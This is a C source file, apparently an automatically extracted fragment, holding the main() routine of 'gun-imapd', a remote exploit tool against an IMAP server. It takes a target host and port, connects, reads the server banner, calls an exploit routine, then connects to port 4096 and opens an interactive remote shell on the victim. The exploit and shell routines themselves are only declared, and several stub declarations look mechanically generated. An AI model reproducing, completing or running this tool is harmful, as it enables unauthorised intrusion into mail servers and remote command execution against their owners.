
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int banner ;


 int EOF ;
 int atoi (char*) ;
 int close (int) ;
 int connectme (char*,int) ;
 int do_sploit (int) ;
 int getopt (int,char**,char*) ;
 int handleshell (int) ;
 int help () ;
 int memset (char*,int,int) ;
 char* optarg ;
 int printf (char*,...) ;
 int read (int,char*,int) ;
 int sleep (int) ;

int main(int argc, char *argv[])
{
int tmp, socke, port = 143;
char *target = 0;
char banner[32];

printf(" . gun-imapd v0.1 by qobaiashi\n |\n");
memset(banner, 0x00, sizeof(banner));

while((tmp = getopt(argc, argv, "p:t:h")) != EOF)
     {
      switch (tmp)
             {
              case 'p':
                         port = atoi(optarg);
                         printf(" |- using port: %d\n", port);
                         break;

              case 't':
                         target = optarg;
                         printf(" |- target host is: %s\n", optarg);
                         break;

              case 'h': help();
              }

      }
if (target == ((void*)0)) help();
socke = connectme(target, port);

if (read(socke, banner, sizeof(banner)) > -1)
   {
    printf(" |- remote host is a %s", (banner+4));
   }

do_sploit(socke);
sleep(1);
tmp = connectme(target, 4096);
handleshell(tmp);

close(tmp);
close(socke);
}
